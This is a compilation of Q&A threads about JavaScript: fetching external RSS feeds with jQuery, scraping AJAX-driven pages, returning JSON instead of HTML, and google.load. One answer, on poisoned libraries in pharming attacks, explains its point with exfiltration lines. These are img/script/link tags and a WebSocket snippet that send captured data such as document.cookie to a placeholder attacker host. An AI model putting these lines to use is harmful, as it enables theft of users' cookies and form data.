I've been looking around for a decent jQuery feed/XML parser and found good plugins like jFeed and jParse (among a few others). None of these support retrieving an external feed though, which is something I'm after.
Pretty sure this is down to jQuery's $.ajax() method rather than the plugins themselves (as they'll be built from this).
Is there some sort of hack I could use to override jQuery, or a raw JavaScript alternative? Better still would be a better plugin, but even the more popular ones I found didn't support it.
Thanks
Try this tutorial:
http://visualrinse.com/2008/09/24/how-to-build-a-simple-rss-reader-with-jquery/ (archive.org)
and demo
http://visualrinse.com/bradley/mm491/reader.html (archive.org)
I recently built AMJR (Asynchronous Multifeed JS Reader) because I couldn't find anything similar to what you're asking for...
AMJR was written to cover a specific need: a multi-feed reader written in JS. In other words, a feed reader that takes multiple feeds as input and outputs the last X items from all the feeds in chronological order. That's functionality you'll easily find in server-side languages, but not in JS! Having it reside in the user's browser (client-side) can take some processing load off the server, especially on high-traffic sites that integrate external feeds. Think of AMJR as your own "Yahoo Pipes" widget to mash up feeds into a single output block.
To summarize things for AMJR:
It can fetch multiple feeds at once while sorting them at the same time chronologically.
It's simple to implement, small in size and fast to load.
It's non-blocking (asynchronous). This means that the browser will continue to load the rest of the page while feeds are loading.
It can handle a huge number of feeds, but the resulting performance depends on your users' download speed. In this example I've deliberately chosen to fetch a ridiculous number of external feeds (150+) so you can see a) the non-blocking process and b) how fast it is.
Feeds are "proxied" via Google's infrastructure (or optionally via Yahoo's YQL), where they get "normalized" and then converted to (compressed) JSON before being sent back to the user's browser (see the sketch after this list).
Built on jQuery but the dependency is so small you can easily adapt it to work with Mootools, YUI etc.
It works on all modern browsers.
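For illustration, here is a rough sketch of the general idea (this is not AMJR's actual code), assuming jQuery and Google's feed-to-JSON endpoint; the feed URLs and the #output element are placeholders:
// Fetch several feeds through Google's feed-to-JSON service, merge the entries
// and sort them chronologically once every feed has answered.
var feeds = ["http://example.com/feed1.rss", "http://example.org/feed2.rss"]; // placeholders
var entries = [];
var pending = feeds.length;

$.each(feeds, function (i, url) {
  $.getJSON("http://ajax.googleapis.com/ajax/services/feed/load?v=1.0&num=10&callback=?",
            { q: url },
            function (data) {
    if (data.responseData && data.responseData.feed) {
      entries = entries.concat(data.responseData.feed.entries);
    }
    if (--pending === 0) {
      entries.sort(function (a, b) {
        return new Date(b.publishedDate) - new Date(a.publishedDate); // newest first
      });
      $.each(entries.slice(0, 10), function (j, entry) {
        $("#output").append("<li><a href='" + entry.link + "'>" + entry.title + "</a></li>");
      });
    }
  });
});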
Info/download at: http://nuevvo.com/labs/amjr/
Enjoy!
The answer looks to be on this page, using YQL instead of my own PHP proxy to handle the requests.
http://james.padolsey.com/javascript/cross-domain-requests-with-jquery/
After finding out that it's not possible to handle these requests with a simple JavaScript call, this jQuery plugin looks ideal; I'm going to try it out later.
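For reference, here's a minimal sketch of the underlying idea (not the plugin's actual code), using Yahoo's public YQL endpoint; the feed URL and the #feed element are just placeholders:
// Ask YQL to fetch the feed server-side and hand it back as JSON(P),
// which sidesteps the same-origin policy.
var feedUrl = "http://example.com/feed.rss";
var query = "select * from rss where url='" + feedUrl + "'";

$.getJSON("http://query.yahooapis.com/v1/public/yql?format=json&callback=?",
          { q: query },
          function (data) {
  if (data.query && data.query.results) {
    $.each(data.query.results.item, function (i, item) {
      $("#feed").append("<li><a href='" + item.link + "'>" + item.title + "</a></li>");
    });
  }
});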
In fact, for parsing RSS feeds without jQuery you can use the Google AJAX Feed API. Works a treat.
http://code.google.com/apis/ajaxfeeds/examples.html
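A minimal sketch of that API's usage, assuming the Google loader (http://www.google.com/jsapi) is included on the page; the feed URL and the #feed element are placeholders:
// Google fetches and parses the feed for you and hands back plain JS objects,
// so there are no same-origin issues and no XML parsing on your side.
google.load("feeds", "1");
google.setOnLoadCallback(function () {
  var feed = new google.feeds.Feed("http://example.com/feed.rss");
  feed.load(function (result) {
    if (result.error) { return; }
    for (var i = 0; i < result.feed.entries.length; i++) {
      var entry = result.feed.entries[i];
      document.getElementById("feed").innerHTML +=
        "<li><a href='" + entry.link + "'>" + entry.title + "</a></li>";
    }
  });
});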
Thanks for the replies
If by retrieving an external feed you mean getting a feed from a different domain than the one your web application is served from, you can't (same-origin policy).
You will need some kind of proxy on the server side, like a PHP or Python script (or whatever your favorite language is), that queries the external feeds and returns their contents to your application.
The jFeed plugin you checked has an example of a PHP proxy.
jFeed has a PHP proxy. I just had this need and jFeed was able to retrieve an external feed. Please edit your question if not using PHP is a requirement.
ANSWER (From what we know): Use jFeed!
However, I just found out that if your feed is not well-formed it will break jFeed. Be warned.
I can only recommend jFeed. I use a fork of it ( https://github.com/uhlenbrock/jfeed ) together with my phonegap project. The fork adds support for parsing the creator tag, and it works perfectly out of the box.
There is a new fashion of loading the jQuery, YUI, or MooTools frameworks (and a lot of plugins too) from an external base site in order to always be working with the latest builds.
In a pharming attack (just to mention one), the original library can be replaced with an infected one in order to manipulate the behavior of the library, the browser, or the plug-ins. It's easy to capture form data, query strings and other info using those libraries, and it's easy to send it somewhere too.
So my question is:
Can the attacker also send this captured data back to the same spoofed pharming host from which the fake library was obtained?
There's a cross-site JavaScript policy in the browser, but does it apply in this case? Remember that the fake library would be loaded from the same spoofed host as the infected page, so there's no call to cross-site DOM objects or functions.
Thanks a lot!
Well, you should think about the ways JavaScript can transmit data to another site:
- AJAX
- frames
- attaching external URLs to DOM objects
- WebSockets
In the first two cases, although there are some hacks, the same-origin policy makes it impossible to transmit data from one site to another hosted on a different (sub)domain or served over a different protocol. Even if the host is "poisoned" by pharming, that doesn't mean the attacker's endpoint will be on the same domain.
It is very easy, however, to access an external URL and send arbitrary GET data to it, simply by attaching that URL to a DOM element that requires one:
<img src="http://attacker-host.com/?stolenData=stolenData" />
<script src="http://attacker-host.com/?stolenData=stolenData"></script>
<link href="http://attacker-host.com/?stolenData=stolenData" />
//... and so on
If the attacker implements a WebSocket data transmitter and you use a modern browser, the data exchange might work.
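For illustration only, a minimal sketch of what such a transmitter could look like; the host and path are hypothetical:
// Hypothetical sketch: a poisoned library opens a socket back to the attacker's
// server and pushes captured values over it once the connection is ready.
var socket = new WebSocket("ws://attacker-host.com/collect");
socket.onopen = function () {
  socket.send(JSON.stringify({ stolenData: document.cookie }));
};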
In conclusion, it can be done, although it is a bit unlikely that someone would sabotage a DNS and modify JS libraries in a way the user could not detect.
EDIT: added the simplest approach: DOM objects.
As mentioned in a previous question, I'm coding a crawler for the QuakeLive website.
I've been using WWW::Mechanize to get the web content and this worked fine for all the pages except the one with matches. The problem is that I need to get all these kind of IDs:
<div id="ffa_c14065c8-d433-11df-a920-001a6433f796_50498929" class="areaMapC">
These are used to build specific match URLs, but I simply can't get them.
I managed to see those IDs only via Firebug; no page downloader, parser or getter I tried was able to get at them. All I can get is a simpler version of the page, whose code is the one you can see via "View Source" in Firefox.
Since Firebug shows the IDs, I can safely assume they are already loaded, but then I can't understand why nothing else gets them. It might have something to do with JavaScript.
You can find a page example HERE
To get at the DOM containing those IDs you'll probably have to execute the JavaScript code on that site. I'm not aware of any libraries that would allow you to do that and then introspect the resulting DOM within Perl, so controlling an actual browser and later asking it for the DOM, or only parts of it, seems like a good way to go about this.
Various browsers provide ways to be controlled programmatically. With a Mozilla-based browser such as Firefox, this could be as easy as loading mozrepl into the browser, opening a socket from Perl space, sending a few lines of JavaScript code over to actually load that page, and then some more JavaScript code to give you back the parts of the DOM you're interested in. The result of that you could then parse with one of the many JSON modules on CPAN.
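For example, the JavaScript you evaluate in the browser could look roughly like this (a sketch, assuming the repl is attached to a browser window so that content.document is the page; the class name comes from the markup quoted in the question):
// Run inside the controlled browser (e.g. over mozrepl): collect the ids of the
// match containers and hand them back as a JSON string for the Perl side to decode.
var ids = [];
var nodes = content.document.getElementsByClassName("areaMapC");
for (var i = 0; i < nodes.length; i++) {
  ids.push(nodes[i].id);
}
JSON.stringify(ids); // the repl echoes this value back over the socket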
Alternatively, you could work through the JavaScript code executed on your page and figure out what it actually does, then mimic that in your crawler.
The problem is that Mechanize mimics the networking layer of the browser but not the rendering or JavaScript execution layer.
Many folks use the web browser control provided by Microsoft. This is a full instance of IE in a control that you can host in a WinForms, WPF or plain old console app. It allows you to, among other things, load the web page and run JavaScript, as well as send and receive JavaScript commands.
Here's a reasonable intro into how to host a browser control: http://www.switchonthecode.com/tutorials/csharp-snippet-tutorial-the-web-browser-control
A ton of data is sent over ajax requests. You need to account for that in your crawler somehow.
It looks like they are using AJAX; I can see where the requests are being sent using Firebug. You may need to pick up on this by parsing and executing the JavaScript that affects the DOM.
You should be able to use WWW::HtmlUnit - it loads and executes JavaScript.
Read the FAQ. WWW::Mechanize doesn't do JavaScript. They're probably using JavaScript to change the page. You'll need a different approach.
Hey everyone, I've been thinking about how the majority of web apps work at the moment. If, for example, the backend is written in Java/PHP/Python, what you probably see is the backend "echoing / printing" ready-made HTML to the browser, right?
For web apps that work almost exclusively with AJAX, is there a reason not to simply communicate without HTML, for example just by passing JSON objects back and forth between the server and client? Instead of "printing or echoing" HTML in our backend script/app, we simply echo the JSON string; AJAX fetches it and converts the JSON string to an object with all of our attributes/arrays and so on.
Surely this way we have fewer characters to send, no HTML tags and so on, and on the client side we simply use frameworks such as jQuery to create/format our HTML there instead of printing and echoing the HTML in the server scripts?
Perhaps people already do this, but I have not really seen a lot of apps work this way.
The reason I want to do this is that I would like to separate the presentation and logic layers more than they currently are: instead of "echoing" HTML in my Java/PHP I just "echo" JSON objects, and JavaScript takes care of the whole presentation layer. Is there something fundamentally wrong with this? What are your opinions?
Thanks again Stackoverflow.
There are quite a few apps that work this way (simply communicating via AJAX using JSON objects rather than sending markup).
I've worked on a few and it has its advantages.
In some cases though (like when working with large result sets) it makes more sense to render the markup on the server side and send it to the browser. That way, you're not relying on JavaScript/DOM Manipulation to create a large document (which, depending on the browser, would perform poorly).
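As a rough sketch of the pattern (the URL, JSON shape and element id below are made up for illustration), the server returns only data and the client builds the markup:
// The backend just echoes a JSON string such as:
//   [{"id": 1, "title": "First post"}, {"id": 2, "title": "Second post"}]
// and the client turns it into HTML.
$.getJSON("/posts.json", function (posts) {
  var items = [];
  $.each(posts, function (i, post) {
    items.push("<li data-id='" + post.id + "'>" + post.title + "</li>");
  });
  $("#posts").html(items.join(""));
});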
This is a very sensible approach, and is actually used in some of our applications in production.
The main weakness of the approach is that it increases the resource load on the browser and therefore might, in light of browsers' often already sluggish JS performance, lead to a worse user experience unless the presentation-layer mechanics are very well tuned.
Nowadays many web apps use this approach, like Gmail and other big apps, even Facebook.
The main advantage of this approach is that the user doesn't need to refresh whole pages and gets exactly what we want to show him, or what he asked for.
But we have to build both versions, the AJAX one and a normal page-refresh one, for when the user refreshes the page.
We can use jQuery templates, which generate the HTML, and also Google's Closure tools, which are used by Gmail and other Google products.
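As an illustration, a minimal sketch assuming the jQuery Templates plugin (jquery.tmpl.js) is loaded; the template, endpoint and target element are placeholders:
// Compile a named template once, then render an array of JSON objects with it.
$.template("postTmpl", "<li><a href='${link}'>${title}</a></li>");

$.getJSON("/posts.json", function (posts) {       // placeholder endpoint
  $.tmpl("postTmpl", posts).appendTo("#posts");   // placeholder target element
});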
There are many tools that scrape HTML pages with javascript off, however are there any that will scrape with javascript on, including pressing buttons that are javascript callbacks?
I'm currently trying to scrape a site that is solely navigated through JavaScript calls. All the buttons that lead to the content execute JavaScript without an href in sight. I could reverse engineer the JavaScript calls (which do, in part, return HTML) but that is going to take some time; are there any shortcuts?
I use HtmlUnit, generally wrapped in a Java-based scripting language like JRuby. HtmlUnit is fantastic because its JavaScript engine handles all of the dynamic functionality, including AJAX, behind the scenes. Makes it very easy to scrape.
Have you tried using scRUBYt!? I'm not 100% sure, but I think I used it to scrape some dynamic web sites.
It has some useful methods like
click_link_and_wait 'Get results', 5
Win32::IE::Mechanize
You could use Watij if you're into Java ( and want to automate Internet Explorer ). Alternatively, you can use Webdriver and also automate Firefox. Webdriver has a Python API too.
At the end of the day, websites which do not use Flash or other embedded plugins need to make HTTP requests from the browser to the server. Most, if not all, of those requests will have patterns within their URIs. Use Firebug/LiveHTTPHeaders to capture all the requests, which in turn will let you see what data comes back. From there, you can build ways to grab the data you want.
That is, of course, assuming they are not using some crappy form of obfuscation/encryption to slow you down.
Google hosts some popular JavaScript libraries at:
http://code.google.com/apis/ajaxlibs/
According to Google:
The most powerful way to load the libraries is by using google.load() ...
What are the real advantages of using
google.load("jquery", "1.2.6")
vs.
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
?
Aside from the benefit of Google being able to bundle multiple files together on the request, there is no perk to using google.load. In fact, if you know all libraries that you want to use (say just jQuery 1.2.6), you're possibly making the user's browser perform one unneeded HTTP connection. Since the whole point of using Google's hosting is to reduce bandwidth consumption and response time, the best decision - if you're just using 1 library - is to call that library directly.
Also, if your site will be using any SSL certificates, you want to plan for this by calling the script via Google's HTTPS connection. There's no downside to calling an HTTPS script from an HTTP page, but calling an HTTP script from an HTTPS page will cause more obscure debugging problems than you would want to think about.
It allows you to dynamically load the libraries in your code, wherever you want.
Because it lets you switch directly to a new version of the library in the javascript, without forcing you to rebuild/change templates all across your site.
It lets Google change the URL (but they can't since the URL method is already established)
In theory, if you do several google.load()s, Google can bundle them into one file, but I don't think that is implemented.
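For reference, the dynamic form looks roughly like this, assuming the Google loader script (http://www.google.com/jsapi) is already included on the page:
// Ask the Google loader for the library, then wait for its callback before
// running any code that depends on it.
google.load("jquery", "1.2.6");

google.setOnLoadCallback(function () {
  $(document).ready(function () {
    // jQuery is available from this point on
    $("body").addClass("jquery-loaded");
  });
});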
I find it's very useful for testing different libraries and different methods, particularly if you're not used to them and want to see their differences side by side, without having to download them. It appears that one of the primary reasons to do it is that it's asynchronous, versus the synchronous script call. You also get some neat stuff that is directly included in the Google loader, like client location: you can get the user's latitude and longitude from it. Not necessarily useful, but it may be helpful if you're planning to have targeted advertising or something of the like.
Not to mention that dynamic loading is always useful. Particularly to smooth out the initial site load. Keeping the initial "site load time" down to as little as possible is something every web designer is fighting an uphill battle on.
You might want to load a library only under special conditions.
Additionally, the google.load method can speed up the initial page display; if you include plain script tags in your HTML code, page rendering will freeze until the file has been loaded.
Personally, I'm interested in whether there's a caching benefit for browsers that will already have loaded that library as well. Seems like if someone browses to google and loads the right jQuery lib and then browses to my site and loads the right jQuery lib... ...both might well use the same cached jQuery. That's just a speculative possibility, though.
Edit: Yep, at the very least when using direct script tags to that location, the JavaScript library will be cached if someone has already requested it from Google (e.g. if it was included by another site somewhere).
If you were to write a boatload of JavaScript that only used the library when a particular event happens, you could wait until the event happens to download the library, which avoids unnecessary HTTP requests for those who don't actually end up triggering the event. However, in the case of libraries like Prototype + Scriptaculous, which downloads over 300kb of JavaScript code, this isn't practical.
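A rough sketch of that lazy-loading idea (the element id and library URL are placeholders; older IE versions fire onreadystatechange rather than onload on script elements):
// Only fetch the library the first time the user actually triggers the feature.
function loadScript(url, onLoaded) {
  var script = document.createElement("script");
  script.type = "text/javascript";
  script.src = url;
  script.onload = onLoaded; // older IE would need onreadystatechange handling
  document.getElementsByTagName("head")[0].appendChild(script);
}

var libraryLoaded = false;
document.getElementById("open-widget").onclick = function () { // placeholder element
  if (libraryLoaded) { return; }
  loadScript("http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js", function () {
    libraryLoaded = true;
    // library-dependent code goes here
  });
};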